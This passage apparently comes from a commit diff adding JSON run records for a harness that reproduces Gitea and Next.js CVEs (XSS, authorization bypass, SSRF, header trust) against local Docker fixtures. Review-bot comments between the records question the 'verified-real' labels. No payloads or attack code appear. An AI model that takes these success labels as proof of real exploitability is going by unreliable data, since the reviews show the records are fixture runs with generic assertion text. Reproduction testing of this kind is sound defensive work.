"step": "collect-logs-and-evidence",
"status": "completed",
"detail": "container_logs=1"
},
{
"at": "2026-03-18T01:28:13+00:00",
"step": "cleanup-compose-environment",
"status": "completed",
"detail": "docker compose down completed"
},
{
"at": "2026-03-18T01:28:13+00:00",
"step": "update-registry-and-reports",
"status": "completed",
"detail": "gitea-gitea--CVE-2020-13246-20260318012806"
}
],
"success_evaluation": {
"passed": true,
"verification_status": "verified-real",
"blocked_reason": null,
"assertions": [
{
"name": "baseline-ok",
"kind": "baseline-ok",
"passed": true,
"detail": "baseline URLs responded without 5xx or transport errors"
},
{
"name": "runner-success",
"kind": "runner-success",
"passed": true,
"detail": "trusted forwarded headers crossed the boundary"
},
{
"name": "browser-present",
"kind": "browser-present",
"passed": true,
"detail": "browser evidence captured"
}
]
},
"historical_status": "verified-real",
"latest_status": "verified-real",
"started_at": "2026-03-18T01:28:06+00:00",
"finished_at": "2026-03-18T01:28:13+00:00",
"blocked_reason": null,
"report_refs": {
"bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806",
"report_md": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/report.md",
"report_html": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/report.html",
"timeline": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/timeline.mmd"
}
}


@@ -0,0 +1,197 @@
{
"run_id": "gitea-gitea--CVE-2021-28378-20260318012813",
"system_id": "gitea",
"advisory_id": "gitea--CVE-2021-28378",
"repro_profile_id": "gitea-xss",
"verification_status": "verified-real",
"verification_mode": "real",
"artifact_mode": "local-fixture",
"target_env": "local-docker",
"compose_services": [
"app"
],
"baseline_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline.json"
],
"attack_steps": [
{
"kind": "runner",
"tool": "gitea.xss",
"status": "completed",
"status_code": 200,
"result_path": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/attack.json"
}
],
"browser_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-page.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-page.json"
],
"browser_evidence": {
"required": true,
"present": true,
"refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-page.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-page.json"
],
"baseline_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-page.json"
],
"proof_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-page.json"
],
"baseline_title": "Gitea Stored XSS Fixture",
"proof_title": "Gitea Stored XSS Fixture - proof",
"error_kind": null,
"reason": null
},
"container_log_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/docker/app.log"
],
"request_log_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/attack.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline.json"
],
"compose_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/compose/compose.yaml"
],
"timeline": [
{
"at": "2026-03-18T01:28:13+00:00",
"step": "select-advisory",
"status": "completed",
"detail": "gitea--CVE-2021-28378"
},
{
"at": "2026-03-18T01:28:13+00:00",
"step": "resolve-repro-profile",
"status": "completed",
"detail": "gitea-xss"
},
{
"at": "2026-03-18T01:28:13+00:00",
"step": "doctor",
"status": "completed",
"detail": "all checks passed"
},
{
"at": "2026-03-18T01:28:16+00:00",
"step": "provision-compose-environment",
"status": "ready",
"detail": ""
},
{
"at": "2026-03-18T01:28:16+00:00",
"step": "wait-ready",
"status": "completed",
"detail": "baseline urls ready (1)"
},
{
"at": "2026-03-18T01:28:16+00:00",
"step": "seed-environment",
"status": "completed",
"detail": "steps=1"
},
{
"at": "2026-03-18T01:28:16+00:00",
"step": "baseline-snapshot",
"status": "completed",
"detail": "urls=1"
},
{
"at": "2026-03-18T01:28:17+00:00",
"step": "browser-replay-before-attack",
"status": "completed",
"detail": ""
},
{
"at": "2026-03-18T01:28:17+00:00",
"step": "controlled-attack-chain",
"status": "completed",
"detail": "steps=1"
},
{
"at": "2026-03-18T01:28:18+00:00",
"step": "browser-replay-after-attack",
"status": "completed",
"detail": ""
},
{
"at": "2026-03-18T01:28:18+00:00",
"step": "collect-logs-and-evidence",
"status": "completed",
"detail": "container_logs=1"
},
{
"at": "2026-03-18T01:28:19+00:00",
"step": "cleanup-compose-environment",
"status": "completed",
"detail": "docker compose down completed"
},
{
"at": "2026-03-18T01:28:19+00:00",
"step": "update-registry-and-reports",
"status": "completed",
"detail": "gitea-gitea--CVE-2021-28378-20260318012813"
}
],
"success_evaluation": {
"passed": true,
"verification_status": "verified-real",
"blocked_reason": null,
"assertions": [
{
"name": "baseline-ok",
"kind": "baseline-ok",
"passed": true,
"detail": "baseline URLs responded without 5xx or transport errors"
},
{
"name": "runner-success",
"kind": "runner-success",
"passed": true,
"detail": "stored payload rendered inside the browser proof page"
},
{
"name": "browser-present",
"kind": "browser-present",
"passed": true,
"detail": "browser evidence captured"
}
]
},
"historical_status": "verified-real",
"latest_status": "verified-real",
"started_at": "2026-03-18T01:28:13+00:00",
"finished_at": "2026-03-18T01:28:19+00:00",
"blocked_reason": null,
"report_refs": {
"bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813",
"report_md": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/report.md",
"report_html": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/report.html",
"timeline": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/timeline.mmd"
}
}
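Review bot: `"verification_status": "verified-real"` is asserted for a run whose `artifact_mode` is `"local-fixture"` and whose proof page is titled "Gitea Stored XSS Fixture", so what was exercised is a stand-in page rather than a pinned Gitea build — the record names no image tag or version anywhere. The runner-success detail "stored payload rendered inside the browser proof page" also only establishes that the payload appeared in the DOM, which is not the same as script execution; the console and network captures listed under `proof_refs` are where execution would show. I would pin what was tested in the record, e.g. `"target_ref": "<image:tag or fixture id>"`, and make the assertion detail name the concrete check (DOM marker vs console/alert marker) so a reader can tell a fixture demonstration from a reproduction against the advisory's affected version.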


@@ -0,0 +1,145 @@
{
"run_id": "gitea-gitea--CVE-2025-68940-20260318012708",
"system_id": "gitea",
"advisory_id": "gitea--CVE-2025-68940",
"repro_profile_id": "gitea-authz-bypass",
"verification_status": "verified-real",
"verification_mode": "real",
"artifact_mode": "local-fixture",
"target_env": "local-docker",
"compose_services": [
"app"
],
"baseline_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/baseline.json"
],
"attack_steps": [
{
"kind": "runner",
"tool": "gitea.authz-bypass",
"status": "completed",
"status_code": 200,
"result_path": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/attack.json"
}
],
"browser_refs": [],
"browser_evidence": {
"required": false,
"present": false,
"refs": [],
"baseline_refs": [],
"proof_refs": [],
"baseline_title": null,
"proof_title": null,
"error_kind": null,
"reason": null
},
"container_log_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/docker/app.log"
],
"request_log_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/attack.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/baseline.json"
],
"compose_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/compose/compose.yaml"
],
"timeline": [
{
"at": "2026-03-18T01:27:08+00:00",
"step": "select-advisory",
"status": "completed",
"detail": "gitea--CVE-2025-68940"
},
{
"at": "2026-03-18T01:27:08+00:00",
"step": "resolve-repro-profile",
"status": "completed",
"detail": "gitea-authz-bypass"
},
{
"at": "2026-03-18T01:27:08+00:00",
"step": "doctor",
"status": "completed",
"detail": "all checks passed"
},
{
"at": "2026-03-18T01:27:11+00:00",
"step": "provision-compose-environment",
"status": "ready",
"detail": ""
},
{
"at": "2026-03-18T01:27:11+00:00",
"step": "wait-ready",
"status": "completed",
"detail": "baseline urls ready (1)"
},
{
"at": "2026-03-18T01:27:11+00:00",
"step": "seed-environment",
"status": "completed",
"detail": "steps=1"
},
{
"at": "2026-03-18T01:27:11+00:00",
"step": "baseline-snapshot",
"status": "completed",
"detail": "urls=1"
},
{
"at": "2026-03-18T01:27:11+00:00",
"step": "controlled-attack-chain",
"status": "completed",
"detail": "steps=1"
},
{
"at": "2026-03-18T01:27:11+00:00",
"step": "collect-logs-and-evidence",
"status": "completed",
"detail": "container_logs=1"
},
{
"at": "2026-03-18T01:27:12+00:00",
"step": "cleanup-compose-environment",
"status": "completed",
"detail": "docker compose down completed"
},
{
"at": "2026-03-18T01:27:12+00:00",
"step": "update-registry-and-reports",
"status": "completed",
"detail": "gitea-gitea--CVE-2025-68940-20260318012708"
}
],
"success_evaluation": {
"passed": true,
"verification_status": "verified-real",
"blocked_reason": null,
"assertions": [
{
"name": "baseline-ok",
"kind": "baseline-ok",
"passed": true,
"detail": "baseline URLs responded without 5xx or transport errors"
},
{
"name": "runner-success",
"kind": "runner-success",
"passed": true,
"detail": "server-side authorization recheck was bypassed"
}
]
},
"historical_status": "verified-real",
"latest_status": "verified-real",
"started_at": "2026-03-18T01:27:08+00:00",
"finished_at": "2026-03-18T01:27:12+00:00",
"blocked_reason": null,
"report_refs": {
"bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708",
"report_md": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/report.md",
"report_html": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/report.html",
"timeline": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/timeline.mmd"
}
}
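Review bot: The only evidence in this record for an authorization bypass is `"status_code": 200` on the attack step plus the detail "server-side authorization recheck was bypassed"; there is no negative control showing that the same request without the bypass technique is denied, so a 200 here cannot be distinguished from an endpoint that was never protected. The same detail string appears verbatim on the nextjs CVE-2024-51479 record in this commit, which suggests it is the profile's fixed message rather than something derived from the response. I would have the runner record the control and the observed pair in the assertion, e.g. `"detail": "control request as <role> -> 403; bypass variant -> 200 (protected marker present)"`, and keep `browser_evidence.required` false only if attack.json carries that comparison.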


@@ -0,0 +1,197 @@
{
"run_id": "nextjs-nextjs--CVE-2020-15242-20260318012830",
"system_id": "nextjs",
"advisory_id": "nextjs--CVE-2020-15242",
"repro_profile_id": "nextjs-proxy-boundary",
"verification_status": "verified-real",
"verification_mode": "real",
"artifact_mode": "local-fixture",
"target_env": "local-docker",
"compose_services": [
"app"
],
"baseline_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline.json"
],
"attack_steps": [
{
"kind": "runner",
"tool": "nextjs.proxy-boundary",
"status": "completed",
"status_code": 200,
"result_path": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/attack.json"
}
],
"browser_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline.png",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-page.json",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof.png",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-page.json"
],
"browser_evidence": {
"required": true,
"present": true,
"refs": [
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline.png",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-page.json",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof.png",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-page.json"
],
"baseline_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline.png",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-page.json"
],
"proof_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof.png",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-page.json"
],
"baseline_title": "Next.js Proxy Boundary Fixture",
"proof_title": "Next.js Proxy Boundary Fixture - proof",
"error_kind": null,
"reason": null
},
"container_log_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/docker/app.log"
],
"request_log_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/attack.json",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline.json"
],
"compose_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/compose/compose.yaml"
],
"timeline": [
{
"at": "2026-03-18T01:28:30+00:00",
"step": "select-advisory",
"status": "completed",
"detail": "nextjs--CVE-2020-15242"
},
{
"at": "2026-03-18T01:28:30+00:00",
"step": "resolve-repro-profile",
"status": "completed",
"detail": "nextjs-proxy-boundary"
},
{
"at": "2026-03-18T01:28:31+00:00",
"step": "doctor",
"status": "completed",
"detail": "all checks passed"
},
{
"at": "2026-03-18T01:28:34+00:00",
"step": "provision-compose-environment",
"status": "ready",
"detail": ""
},
{
"at": "2026-03-18T01:28:34+00:00",
"step": "wait-ready",
"status": "completed",
"detail": "baseline urls ready (1)"
},
{
"at": "2026-03-18T01:28:34+00:00",
"step": "seed-environment",
"status": "completed",
"detail": "steps=1"
},
{
"at": "2026-03-18T01:28:34+00:00",
"step": "baseline-snapshot",
"status": "completed",
"detail": "urls=1"
},
{
"at": "2026-03-18T01:28:34+00:00",
"step": "browser-replay-before-attack",
"status": "completed",
"detail": ""
},
{
"at": "2026-03-18T01:28:34+00:00",
"step": "controlled-attack-chain",
"status": "completed",
"detail": "steps=1"
},
{
"at": "2026-03-18T01:28:35+00:00",
"step": "browser-replay-after-attack",
"status": "completed",
"detail": ""
},
{
"at": "2026-03-18T01:28:35+00:00",
"step": "collect-logs-and-evidence",
"status": "completed",
"detail": "container_logs=1"
},
{
"at": "2026-03-18T01:28:37+00:00",
"step": "cleanup-compose-environment",
"status": "completed",
"detail": "docker compose down completed"
},
{
"at": "2026-03-18T01:28:37+00:00",
"step": "update-registry-and-reports",
"status": "completed",
"detail": "nextjs-nextjs--CVE-2020-15242-20260318012830"
}
],
"success_evaluation": {
"passed": true,
"verification_status": "verified-real",
"blocked_reason": null,
"assertions": [
{
"name": "baseline-ok",
"kind": "baseline-ok",
"passed": true,
"detail": "baseline URLs responded without 5xx or transport errors"
},
{
"name": "runner-success",
"kind": "runner-success",
"passed": true,
"detail": "trusted forwarded headers crossed the boundary"
},
{
"name": "browser-present",
"kind": "browser-present",
"passed": true,
"detail": "browser evidence captured"
}
]
},
"historical_status": "verified-real",
"latest_status": "verified-real",
"started_at": "2026-03-18T01:28:30+00:00",
"finished_at": "2026-03-18T01:28:37+00:00",
"blocked_reason": null,
"report_refs": {
"bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830",
"report_md": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/report.md",
"report_html": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/report.html",
"timeline": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/timeline.mmd"
}
}
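Review bot: Every `*_refs` entry in this record is an absolute path under `/Users/x/websafe/…`, so the committed registry is tied to one developer's machine: the report links break for anyone else and the local directory layout is disclosed in the repository. Paths should be written relative to the repository root, e.g. `"report_md": "06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/report.md"`, and resolved by whatever renders the report. Separately, the runner-success detail "trusted forwarded headers crossed the boundary" is the same text as on the gitea CVE-2020-13246 record above, which reads as the profile's generic message; I would confirm that forwarded-header trust is actually the vulnerability class of this advisory before the record carries "verified-real", and have the detail state which header was injected and which downstream decision changed.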


@@ -0,0 +1,145 @@
{
"run_id": "nextjs-nextjs--CVE-2024-34351-20260318012953",
"system_id": "nextjs",
"advisory_id": "nextjs--CVE-2024-34351",
"repro_profile_id": "nextjs-ssrf",
"verification_status": "verified-real",
"verification_mode": "real",
"artifact_mode": "local-fixture",
"target_env": "local-docker",
"compose_services": [
"app"
],
"baseline_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/baseline.json"
],
"attack_steps": [
{
"kind": "runner",
"tool": "nextjs.ssrf",
"status": "completed",
"status_code": 200,
"result_path": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/attack.json"
}
],
"browser_refs": [],
"browser_evidence": {
"required": false,
"present": false,
"refs": [],
"baseline_refs": [],
"proof_refs": [],
"baseline_title": null,
"proof_title": null,
"error_kind": null,
"reason": null
},
"container_log_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/docker/app.log"
],
"request_log_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/attack.json",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/baseline.json"
],
"compose_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/compose/compose.yaml"
],
"timeline": [
{
"at": "2026-03-18T01:29:53+00:00",
"step": "select-advisory",
"status": "completed",
"detail": "nextjs--CVE-2024-34351"
},
{
"at": "2026-03-18T01:29:53+00:00",
"step": "resolve-repro-profile",
"status": "completed",
"detail": "nextjs-ssrf"
},
{
"at": "2026-03-18T01:29:53+00:00",
"step": "doctor",
"status": "completed",
"detail": "all checks passed"
},
{
"at": "2026-03-18T01:29:56+00:00",
"step": "provision-compose-environment",
"status": "ready",
"detail": ""
},
{
"at": "2026-03-18T01:29:56+00:00",
"step": "wait-ready",
"status": "completed",
"detail": "baseline urls ready (1)"
},
{
"at": "2026-03-18T01:29:56+00:00",
"step": "seed-environment",
"status": "completed",
"detail": "steps=1"
},
{
"at": "2026-03-18T01:29:56+00:00",
"step": "baseline-snapshot",
"status": "completed",
"detail": "urls=1"
},
{
"at": "2026-03-18T01:29:56+00:00",
"step": "controlled-attack-chain",
"status": "completed",
"detail": "steps=1"
},
{
"at": "2026-03-18T01:29:56+00:00",
"step": "collect-logs-and-evidence",
"status": "completed",
"detail": "container_logs=1"
},
{
"at": "2026-03-18T01:29:57+00:00",
"step": "cleanup-compose-environment",
"status": "completed",
"detail": "docker compose down completed"
},
{
"at": "2026-03-18T01:29:57+00:00",
"step": "update-registry-and-reports",
"status": "completed",
"detail": "nextjs-nextjs--CVE-2024-34351-20260318012953"
}
],
"success_evaluation": {
"passed": true,
"verification_status": "verified-real",
"blocked_reason": null,
"assertions": [
{
"name": "baseline-ok",
"kind": "baseline-ok",
"passed": true,
"detail": "baseline URLs responded without 5xx or transport errors"
},
{
"name": "runner-success",
"kind": "runner-success",
"passed": true,
"detail": "server-side callback reached the local sink"
}
]
},
"historical_status": "verified-real",
"latest_status": "verified-real",
"started_at": "2026-03-18T01:29:53+00:00",
"finished_at": "2026-03-18T01:29:57+00:00",
"blocked_reason": null,
"report_refs": {
"bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953",
"report_md": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/report.md",
"report_html": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/report.html",
"timeline": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/timeline.mmd"
}
}
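Review bot: The SSRF assertion "server-side callback reached the local sink" does not say where the sink lived or who could reach it; with `compose_services` listing only `app`, the sink is presumably on the runner side, and a callback the runner could have produced itself is not proof that the application made the request. The record should capture the sink address and show that it was reachable only from the app container's network, or carry the request source as observed by the sink, e.g. `"detail": "callback to http://<sink>:<port>/<token> observed from <app container address>; sink not published to host"`. Until then the 200 on the attack step only shows that the endpoint accepted the input.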


@@ -0,0 +1,145 @@
{
"run_id": "nextjs-nextjs--CVE-2024-51479-20260318012913",
"system_id": "nextjs",
"advisory_id": "nextjs--CVE-2024-51479",
"repro_profile_id": "nextjs-authz-bypass",
"verification_status": "verified-real",
"verification_mode": "real",
"artifact_mode": "local-fixture",
"target_env": "local-docker",
"compose_services": [
"app"
],
"baseline_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/baseline.json"
],
"attack_steps": [
{
"kind": "runner",
"tool": "nextjs.authz-bypass",
"status": "completed",
"status_code": 200,
"result_path": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/attack.json"
}
],
"browser_refs": [],
"browser_evidence": {
"required": false,
"present": false,
"refs": [],
"baseline_refs": [],
"proof_refs": [],
"baseline_title": null,
"proof_title": null,
"error_kind": null,
"reason": null
},
"container_log_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/docker/app.log"
],
"request_log_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/attack.json",
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/baseline.json"
],
"compose_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/compose/compose.yaml"
],
"timeline": [
{
"at": "2026-03-18T01:29:13+00:00",
"step": "select-advisory",
"status": "completed",
"detail": "nextjs--CVE-2024-51479"
},
{
"at": "2026-03-18T01:29:13+00:00",
"step": "resolve-repro-profile",
"status": "completed",
"detail": "nextjs-authz-bypass"
},
{
"at": "2026-03-18T01:29:13+00:00",
"step": "doctor",
"status": "completed",
"detail": "all checks passed"
},
{
"at": "2026-03-18T01:29:16+00:00",
"step": "provision-compose-environment",
"status": "ready",
"detail": ""
},
{
"at": "2026-03-18T01:29:16+00:00",
"step": "wait-ready",
"status": "completed",
"detail": "baseline urls ready (1)"
},
{
"at": "2026-03-18T01:29:16+00:00",
"step": "seed-environment",
"status": "completed",
"detail": "steps=1"
},
{
"at": "2026-03-18T01:29:16+00:00",
"step": "baseline-snapshot",
"status": "completed",
"detail": "urls=1"
},
{
"at": "2026-03-18T01:29:16+00:00",
"step": "controlled-attack-chain",
"status": "completed",
"detail": "steps=1"
},
{
"at": "2026-03-18T01:29:16+00:00",
"step": "collect-logs-and-evidence",
"status": "completed",
"detail": "container_logs=1"
},
{
"at": "2026-03-18T01:29:17+00:00",
"step": "cleanup-compose-environment",
"status": "completed",
"detail": "docker compose down completed"
},
{
"at": "2026-03-18T01:29:17+00:00",
"step": "update-registry-and-reports",
"status": "completed",
"detail": "nextjs-nextjs--CVE-2024-51479-20260318012913"
}
],
"success_evaluation": {
"passed": true,
"verification_status": "verified-real",
"blocked_reason": null,
"assertions": [
{
"name": "baseline-ok",
